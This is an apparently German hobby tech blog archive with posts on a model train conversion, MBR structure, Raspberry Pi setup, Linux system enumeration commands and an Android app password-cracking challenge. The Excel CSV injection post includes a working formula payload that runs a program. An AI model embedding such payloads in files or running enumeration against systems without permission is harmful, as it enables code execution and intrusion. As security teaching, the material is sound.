Umbau Berliner S-Bahn (BR481)

2017-11-04 von admin

Das Souvenirmodell Berliner S-Bahn (BR481) ist im Shop Lemke ausschließlich als Standmodell erhältlich. Da „STEHEN“ für eine Modellbahn viel zu schade ist, wurde das Modell umgebaut und ist jetzt fahrfähig.


Für den Umbau wurden folgende Materialien verwendet:

  • Antriebsdrehgestell vom ICE3 (Piko)
  • Drehgestelle vom ICE3
  • Motor ICE3
  • Kardanwelle ICE3
  • Plastikklebstoff ;)

Die hauptsächliche Schwierigkeit bestand darin, das Antriebsdrehgestell in den Wagen einzupassen. Hierfür musste der Rahmen gefräst werden, um den notwendigen Platz für Motor und Kardanwelle zu schaffen.

Danke E. Wolf für den Gastbeitrag. :)

Kategorie: Modellbahn Schlagwörter: , , , , , ,

Excel CSV Injection

2017-11-01 von admin

Vor einiger Zeit wurde eine interessante Möglichkeit identifiziert, um mittels einer CSV Datei eine Ausführung eines beliebigen Programms mit MS Excel zu bewerkstelligen. Als Basis dafür kann eine beliebige CSV Datei verwendet werden:

UserId,Datum,ProjektName,Beschreibung,Dauer
1,2017-11-01,Test Projekt,Das ist ein Test,180
2,2017-08-17,Hausbau,"Haus1, Haus2, Haus3", 240
3,2017-07-25,Wichtiger Kunde,"=2+2+cmd|' /C calc'!A0", 240

In der Zeile drei und in der Spalte Beschreibung wird eine Formel verwendet:

"=2+2+cmd|' /C calc'!A0"

Schritt 1

Als erstes die Datei mit MS Excel öffnen.

Schritt 2

Danach die entsprechenden Zeilen markieren.

Schritt 3

Daraufhin auf den Reiter „DATEN“ wechseln und Button „Text in Spalten“ klicken.

Jetzt dem Wizard mit „Weiter“ folgen.

Die Option „Komma“ wählen und „Fertig stellen“ klicken.

Es erfolgt ein Sicherheitshinweis durch Excel.

Schritt 4

Und siehe da, der Taschenrechner wird gestartet.

 

Quelle

http://georgemauer.net/2017/10/07/csv-injection.html

Kategorie: IT Schlagwörter: , , ,

Wie funktioniert Deep Learning? Spieltheorie ganz spielerisch…, JavaScript Cheatsheet

2017-10-30 von admin

Hier wieder ein paar interessante Seiten, um das schlechte Wetter zu überbrücken. :)

 

Wie funktioniert Deep Learning?

In diesem Artikel wird sehr anschaulich der Unterschied zwischen Artificial Intelligence (AI) und Machine Learning (ML) beschrieben. Darauf basierend wird die Funktionsweise von Deep Learning erklärt.

https://medium.freecodecamp.org/want-to-know-how-deep-learning-works-heres-a-quick-guide-for-everyone-1aedeca88076

 

Spieltheorie ganz spielerisch…

Warum werden in Friedenszeiten Freunde zu Feinden und warum werden in Kriegszeiten Feinde zu Freunden? Anhand der Spieltheorie wird die Epidemie des Misstrauens erklärt. Etwas Zeit sollte mitgebracht werden, um die schön gestalteten Animationen zu genießen.

https://jkoelling.github.io/trust/

 

ES2015 Cheatsheet

Ein schneller Überblick über neue JavaScript-Funktionen in ES2015, ES2016, ES2017 und darüber hinaus.

https://devhints.io/es6

Kategorie: Wantedlink

MBR (Master Boot Record)

2017-10-15 von admin

Der Master Boot Record (MBR) ist ein Startprogramm und befindet sich im ersten Sektor eines bootfähigen Speichermediums (Festplatte, CD, USB, …). Unter Linux ist der MBR meist unter „/dev/hda“ oder „/dev/sda“ zu finden. Die Größe beträgt 512 Byte und unterteilt sich in die Bereiche:

Bereiche Größe
Bootloader 440 Byte
Datenträgersignatur 4 Byte
Null 2 Byte
Partitionstabelle  64 Byte
Bootsektor-Signatur  2 Byte

 

Mit dem Befehl „dd“ kann der MBR in eine separate Datei extrahiert werden.

dd if=/dev/sda of=/tmp/mbr.dmp bs=512 count=1

Um die erstellte Datei anzuschauen, kann ein beliebiger Hex-Editor oder der Befehl „od“ verwendet werden.

od -t x1 /tmp/mbr.dmp
0000000 eb 63 90 10 8e d0 bc 00 b0 b8 00 00 8e d8 8e c0
0000020 fb be 00 7c bf 00 06 b9 00 02 f3 a4 ea 21 06 00
0000040 00 be be 07 38 04 75 0b 83 c6 10 81 fe fe 07 75
0000060 f3 eb 16 b4 02 b0 01 bb 00 7c b2 80 8a 74 01 8b
0000100 4c 02 cd 13 ea 00 7c 00 00 eb fe 00 00 00 00 00
0000120 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00
0000140 00 00 00 00 ff fa 90 90 f6 c2 80 74 05 f6 c2 70
0000160 74 02 b2 80 4b 79 7c 5c 00 31 c0 8e d8 8e d0 bc
0000200 00 20 fb a0 64 7c 3c ff 74 02 88 c2 52 bb 17 04
0000220 f6 07 03 74 06 be 88 7d e8 17 01 be 05 7c b4 41
0000240 bb aa 55 cd 13 5a 52 72 3d 81 fb 55 aa 75 37 83
0000260 e1 01 74 32 31 c0 89 44 04 40 88 44 ff 89 44 02
0000300 c7 04 10 00 66 8b 1e 5c 7c 66 89 5c 08 66 8b 1e
0000320 60 7c 66 89 5c 0c c7 44 06 00 70 b4 42 cd 13 72
0000340 05 bb 00 70 eb 76 b4 08 cd 13 73 0d 5a 84 d2 0f
0000360 83 d0 00 be 93 7d e9 82 00 66 0f b6 c6 e8 64 ff
0000400 40 66 89 44 04 0f b6 d1 c1 e2 02 88 e8 88 f4 40
0000420 89 44 08 0f b6 c2 c0 e8 02 66 89 04 66 a1 60 7c
0000440 66 09 c0 75 4e 66 a1 ea 7c 66 31 d2 66 f7 34 88
0000460 d1 31 d2 66 f7 74 04 3b 44 08 7d 37 fe c1 88 c5
0000500 30 c0 c1 e8 02 08 c1 88 d0 5a 88 c6 bb 00 70 8e
0000520 c3 31 0c b8 01 02 cd 13 72 1e 8c c3 60 1e b9 00
0000540 01 8e db 31 f6 bf 00 80 8e c6 fc f3 a5 1f 61 ff
0000560 26 5a 7c be 8e 7d eb 03 be 9d 7d e8 34 00 be a2
0000600 7d c3 2e 00 cd 18 eb fe 47 52 55 42 20 00 47 65
0000620 6f 6d 00 48 61 72 64 20 44 69 73 6b 00 52 65 61
0000640 64 00 20 45 72 72 6f 72 0d 0a 00 bb 01 00 b4 0e
0000660 cd 10 ac 3c 00 75 f4 c3 0c fe b9 00 00 00 80 20
0000700 21 00 83 fe ff ff 00 08 00 00 00 08 e9 02 00 fe
0000720 ff ff 05 fe ff ff fe 17 e9 02 02 a0 fe 0b 00 00
0000740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa
0001000

 

Bootloader (440 Byte)

Die ersten 440 Byte gehören zum Bootloader und nach der Ausführung sucht dieser in der Partitionstabelle nach einer aktiven Partition. Je nach System kann es sein, dass der Bootloader größer als 440 Byte ist und sich somit auf dem Dateisystem einer Festplatte befindet oder das ein Bootmanager verwendet wird.

Wenn die aktive Partition gefunden wurde, wird das eigentliche Betriebssystem gestartet.

Datenträgersignatur (4 Byte)

Die Datenträgersignatur (Disk Signature oder Disk identifier) wird von Windows 2000 und XP verwendet, um Datenträger (Partitionen) eindeutig zu identifizieren, bspw. für die Zuordnung von Laufwerksbuchstaben zu einer Partition. Die Datenträgersignatur besteht aus einem zufällig generierten Wert.

Null (2 Byte)

Nach der Datenträgersignatur folgen zwei leere Bytes.

Partitionstabelle (64 Byte)

Die Partitionstabelle teilt sich in vier Sektionen zu 16 Byte auf. Die vier verfügbaren Partitionen sind in Orange, Grün, Magenta und Hellblau hervorgehoben. Die Bedeutung der einzelnen Bytes werden anhand der ersten Partition erläutert.

Byte Größe  Partition 1 Beschreibung
1 80 Gibt an, ob eine Partition gestartet werden kann.

0x80 = bootfähig

0x00 = nicht bootfähig

3 20 21 00 CHS-Eintrag des ersten Sektors
1 83 Kennzeichnung des Partitionstyps.

0x00 = leer/unbenutzt
0x01 = FAT12 ≤ 16MB (hauptsächlich Floppy Disks aber auch Speicherkarten)
0x04 = FAT16 ≤ 32 MiB
0x05 = erweiterte Partition
0x06 = FAT16 > 32 MiB
0x07 = NTFS (Windows NT/2000/XP/Vista/7/8), HPFS (OS/2) oder exFAT
0x0B = FAT32
0x0C = FAT32 mit BIOS-Extensions (LBA)
0x0E = FAT16 > 32 MiB mit BIOS-Extensions (LBA)
0x0F = erweiterte Partition mit BIOS-Extensions (LBA)
0x12 = OEM-Partition für Konfiguration, Diagnose, BIOS-Erweiterung
0x27 = Windows RE versteckte Partition
0x42 = Dynamischer Datenträger
0x82 = Linux Swap/Solaris 2.6 X86 bis Solaris 9 X86
0x83 = Linux Native
0x8E = Linux LVM
0xA5 = FreeBSD
0xA6 = OpenBSD
0xA9 = NetBSD
0xEE = Legacy MBR mit folgendem EFI-Header
0xEF = EFI-Dateisystem

mehr

3 fe ff ff CHS-Eintrag des letzten Sektors
4 00 08 00 00 Startsektor, relativ zum Anfang der Festplatte oder zur erweiterten Partition
4 00 08 e9 02 Anzahl der Sektoren in der Partition per LBA-Methode

 

Bootsektor-Signatur (2 Byte)

Die Bootsektor-Signatur wird auch „Magic Number“ genannt und schließt den MBR ab. Wird die Signatur von einem BIOS gefunden, wird der MBR als gültiger Bootsektor gehandhabt. Fehlt hingegen die Signatur, wird der Bootvorgang abgebrochen.

 

Weiter führende Links

Linux – Boot Prozess

Master Boot Record

Kategorie: IT Schlagwörter: ,

Linux – information gathering (part 4)

2017-10-08 von admin

This is the fourth part of Linux – information gathering.

Network

Find all available network connections.

ifconfig -a

In the following files you can find specific information about the desired network configuration.

cat /etc/network/interfaces
cat /etc/sysconfig/network

You can find the configuration file for DNS resolvers here:

cat /etc/resolv.conf
cat /etc/networks

With the administration tool for IPv4/IPv6 packet filtering and NAT you can list all filters.

iptables -L

Show or set the system’s host name.

hostname

Show the system’s DNS domain name.

dnsdomainname

Connections

The command „lsof“ lists open files.

lsof -i

List port socket numbers of standard services.

cat /etc/services

The command „netstat“ or „chkconfig“ lists network connections

netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list

Cache

With „arp“ you can manipulate or display the kernel’s IPv4 network neighbour cache.

arp -e

The following command displays existing routes.

route

 

Previous parts

Linux – information gathering (part 1)

Linux – information gathering (part 2)

Linux – information gathering (part 3)

Linux – information gathering (part 4)

Kategorie: IT Schlagwörter:

Raspberry PI: Installation ohne Monitor (Raspbian Stretch)

2017-10-03 von admin

Vor einiger Zeit habe ich das Betriebssystem Raspbian auf einem Raspberry PI installiert. Nachdem sich die Schritte für eine Installationen etwas geändert haben, hier eine überarbeitete Anleitung. Für die Installation wurde folgende Version verwendet:

Raspbian Stretch with desktop
Image with desktop based on Debian Stretch
Version: September 2017
Release date: 2017-09-07
Kernel version: 4.9

 

Schritt 1: Download des Betriebssystems unter https://www.raspberrypi.org/downloads/

wget https://downloads.raspberrypi.org/raspbian_latest

Schritt 2: Formatieren der microSD-Karte mit FAT32. (Hinweis: Die Device Adresse kann von der hier angegebenen abweichen!) Alternativ kann hier auch die Software gparted verwendet werden.

sudo mkfs.vfat /dev/mmcblk0

Schritt 3 (Optional): Vergabe einer Volumenbezeichnung

mlabel -i /dev/mmcblk0 ::meinpi  # for fat32

Schritt 4: Entpacken des runtergeladenen Betriebssystems Images

unzip raspbian_latest.zip

Schritt 5: Image Datei auf die SD-Karte übertragen

dd bs=4M if=2017-09-07-raspbian-stretch.img of=/dev/mmcblk0 conv=fsync

Schritt 6: Danach erneut auf die SD-Karte zugreifen, da aus Sicherheitsgründen SSH per default deaktiviert ist. Für die Aktivierung des Remote-Zugriffs über SSH muss eine eine leere Datei mit dem Namen „ssh“ auf der Boot Partition abgelegt werden.

touch ssh

Schritt 7: Die SD-Karte in den Raspberry Pi schieben bis es leise klickt, dann ist die Karte eingerastet. Danach noch das Netzteil und das Netzwerkkabel anschließen.

Schritt 8: Um den Pi im Netzwerk zu finden, einfach mit nmap scannen oder im Router nachschauen, welche IP Adresse vergeben wurde.

nmap -sP 192.168.168.*

Schritt 9: Erste Anmeldung am Pi mit der gefundenen IP-Adresse.

ssh pi@192.168.168.21

Das default Passwort lautet: raspberry

Schritt 10: Ändern des default Passworts

passwd

Schritt 11: Update des Systems

sudo apt-get update
sudo apt-get dist-upgrade

Schritt 12: Konfiguration des Systems (Uhrzeit, Zeitzone, …)

sudo raspi-config

Schritt 13 (Optional): Remote Desktop installieren

sudo apt-get install xrdp

Der xrdp Prozess wir automatisch beim Starten des Raspberry Pi geladen. Der Status kann wie folgt abgefragt werden:

/etc/init.d/xrdp status

Schritt 14 (Optional): Daraufhin kann eine Remote Desktop Verbindung unter Ubuntu eingerichtet werden. Zu finden ist das Programm im Menü unter „Internet | Zugriff auf entfernte Arbeitsflächen“.

pi3

Nachdem eine Verbindung aufgebaut ist, kann der Desktop verwendet werden.

Kategorie: IT Schlagwörter: , ,

Hack-IT: Reverse Engineering einer Android App

2017-09-28 von admin

Bei diesem Hack-IT geht es um eine Android App, welche im Google Play Store erhältlich ist. Die Aufgabe besteht darin, dass einzugebende Passwort in der App herauszufinden.

Link zur App: https://play.google.com

 

Schritt 1

Für eine Analyse der App muss diese heruntergeladen werden. Dafür gibt es zahlreiche Tools, ich habe die Website apkpure.com verwendet. Im Suchfeld auf der Seite die Adresse der App eingeben und danach den „Download“ Button betätigen. Daraufhin steht die APK Datei zur Verfügung.

 

Schritt 2

Mit der Software dex2jar können DEX Dateien in JAR Dateien umgewandelt werden. Nach dem Download der Software sourceforge.net/projects/dex2jar/ wird das Archiv noch entpackt

unzip dex2jar-2.0.zip

und Rechte vergeben.

chmod -R +x dex2jar-2.0/

Schritt 3

Jetzt kann die APK Datei umgewandelt werden.

./dex2jar-2.0/d2j-dex2jar.sh CanYouHack.apk

Danach steht die Datei „CanYouHack-dex2jar.jar“ zur Verfügung.

Schritt 4

Als nächstes das Programm JD-GUI (jd.benow.ca) herunterladen, mit welchem der Inhalt der JAR Datei ganz einfach angeschaut werden kann.

Daraufhin heißt es suchen, in der Klasse „Mobile1“ wird der hilfreiche Text „… right password!“ aufgeführt.

Die IF-Anweisung darüber verrät uns das gesuchte Passwort:

if (paramAnonymousView.getText().toString().equals("1337"))

Das gesuchte Passwort lautet: 1337 und das Hack-IT ist gelöst.

Kategorie: IT Schlagwörter: , , , , ,